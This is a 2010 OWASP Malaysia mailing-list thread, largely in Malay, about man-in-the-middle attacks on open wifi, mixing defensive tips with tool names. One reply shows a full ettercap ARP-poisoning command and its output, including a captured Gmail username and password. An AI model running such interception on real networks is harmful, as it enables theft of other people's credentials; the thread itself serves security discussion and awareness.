This paper is quite old, but it helps us to understand on how to detect sniffer.
www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran <[email protected]>wrote: > Hebat Guru Faizul nie buat live hack.. . memandangkan open network memang > bermasalah lagi2 kalau ada di mamak,kopitiam, atau mana2 kedai yang > memberikan access free wifi nie. Ramai rakyat Malaysia tidak sedar akan > kebolehan para2 hacker ni mencuri maklumat tanpa disedari oleh pengguna yang > rata2 nye bergumbira bila dapat Wifi free tapi belakang takbir mereka tak > tau. > > Tapi please consider use VPN kalau nak masuk ke open network nie.. maybe > akan banyak membantu anda untuk protect laptop anda dari di sniffer yang > senantiasa membaca packet anda... > > Pastikan anda delete semua cookie yang ada dalam browser anda sebelum > connect ke wifi tersebut. Pastikan yer!! > > Kalau untuk pengguna window tegar boleh try guna Hotspot > Shield<http://anchorfree.com/downloads/hotspot-shield/>ini. banyak > kebaikannya... amin!!! dah ada untuk iphone la .. boleh download > untuk peminat2 iphone. :) > > Pastikan laptop anda tidak ada buat public file sharing.. pastikan tau!!! > > Last jangan connect terlampau lama dengan open network ni lagi lama anda > connect lagi banyak information hackers2 ni dapat. Pastikan anda tidak leka > dan lalai yer!!! > > Sebenarnya banyak lagi software yang boleh digunakan untuk protect laptop > anda jika anda banyak explore dan menyelidik sedikit sebanyak tentang cara > nak protect laptop anda especially untuk pengguna windows.. tapi jangan > sangka pulak pengguna OS lain boleh terlepas... huhuhu. > P/S: kalau anda rasa anda seorang geek cuba guna ARPWatch, Arpsnmp atau > DecaffeinatID anda mesti menyukainya.. :P > On Fri, Sep 24, 2010 at 9:20 PM, Faizul <[email protected]> wrote: > >> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah target >> dan 254 adalah gateway >> >> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau >> dragon >> >> Listening on eth0... (Ethernet) >> >> eth0 -> 00:0C:29:97:59:E4 10.1.1.1 255.255.255.0 >> >> Privileges dropped to UID 0 GID 0... >> >> 28 plugins >> 39 protocol dissectors >> 53 ports monitored >> 7587 mac vendor fingerprint >> 1698 tcp OS fingerprint >> 2183 known services >> >> Scanning for merged targets (2 hosts)... >> >> * |==================================================>| 100.00 % >> >> 2 hosts added to the hosts list... >> >> ARP poisoning victims: >> >> GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92 >> >> GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6 >> Starting Unified sniffing... >> >> >> Text only Interface activated... >> Hit 'h' for inline help >> >> HTTP : 74.125.127.99:443 -> USER: 9w2pju PASS: selamathariraya INFO: >> https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3 >> >> >> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <[email protected]> wrote: >> >>> Haris, >>> >>> Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar... >>> >>> >>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <[email protected]>wrote: >>> >>>> Based on the blog post, plenty of tools can be used to perform such >>>> attacks. Nowadays tools are getting more "user friendly" and yeah since >>>> he's using insecure Wifi facility -visible network packets/traffics - >>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with >>>> ferret and hamster is much more easier. But based on the symptoms or the >>>> screenshots, it is more monkey in the middle attack compared to >>>> sidejacking (I prefer this one). >>>> >>>> So, never access your private accounts using insecure or open ap >>>> wireless environment. Guna la broadband.. :D >>>> >>>> p/s: besides I believe nobody actually read/understand/concern on the >>>> warning popups regarding the cert validity. Usually we just click "Add >>>> exception" and "proceed" :D >>>> >>>> That's my 2 halala >>>> >>>> Thanks >>>> >>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote: >>>> > There is https/ssl mitm in the cain & abel using fake private/public >>>> key. It intercepts the ssl handshake and providing the fake key (if the key >>>> is not trusted) to the client. In my previous test, my friend realized a >>>> fake ssl for maybank site when I'm running the attack, and he told me >>>> maybank has been hacked (but not). For wireless (not ethernet) layer 2, >>>> there is utility like airpwn and karma for this kind of attack. I haven't >>>> read yet the blog but to answer first the question. Wallahualam. >>>> > Sent from my BlackBerry® smartphone >>>> > >>>> > -----Original Message----- >>>> > From: Harisfazillah Jamel <[email protected]> >>>> > Sender: [email protected] >>>> > Date: Fri, 24 Sep 2010 19:21:31 >>>> > To: owasp-malaysia<[email protected]> >>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless >>>> > >>>> > Tittle should be man in the minddle attack.. >>>> > >>>> > ettercap can be used to capture packet. But its hard to get our >>>> > password in HTTPS protocol. I believe a kind of proxy is used for >>>> > this. >>>> > >>>> > Any idea what kind of proxy? >>>> > >>>> > >>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote: >>>> >> ARP poisoning can be used.ettercap >>>> >> >>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" <[email protected]> >>>> wrote: >>>> >>> Assalamualaikum and salam sejahtera, >>>> >>> >>>> >>> Would like to share this blog post. >>>> >>> >>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/ >>>> >>> >>>> >>> How man in the middle attack can be used in this case? >>>> >>> >>>> >>> Thanks. >>>> > _______________________________________________ >>>> > Owasp-Malaysia mailing list >>>> > [email protected] >>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> > >>>> > OWASP Malaysia Wiki >>>> > http://www.owasp.org/index.php/Malaysia >>>> > >>>> > OWASP Malaysia Wiki Facebook >>>> > >>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> > _______________________________________________ >>>> > Owasp-Malaysia mailing list >>>> > [email protected] >>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> > >>>> > OWASP Malaysia Wiki >>>> > http://www.owasp.org/index.php/Malaysia >>>> > >>>> > OWASP Malaysia Wiki Facebook >>>> > >>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> > >>>> >>>> _______________________________________________ >>>> Owasp-Malaysia mailing list >>>> [email protected] >>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >>>> OWASP Malaysia Wiki >>>> http://www.owasp.org/index.php/Malaysia >>>> >>>> OWASP Malaysia Wiki Facebook >>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >>> >>> >>> _______________________________________________ >>> Owasp-Malaysia mailing list >>> [email protected] >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >>> OWASP Malaysia Wiki >>> http://www.owasp.org/index.php/Malaysia >>> >>> OWASP Malaysia Wiki Facebook >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> >> >> -- >> 73 de 9W2PJU >> >> http://9w2pju.blogspot.com >> >> >> _______________________________________________ >> Owasp-Malaysia mailing list >> [email protected] >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> OWASP Malaysia Wiki >> http://www.owasp.org/index.php/Malaysia >> >> OWASP Malaysia Wiki Facebook >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > Mohd Fazli Azran > Pengguna Internet Tegar > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
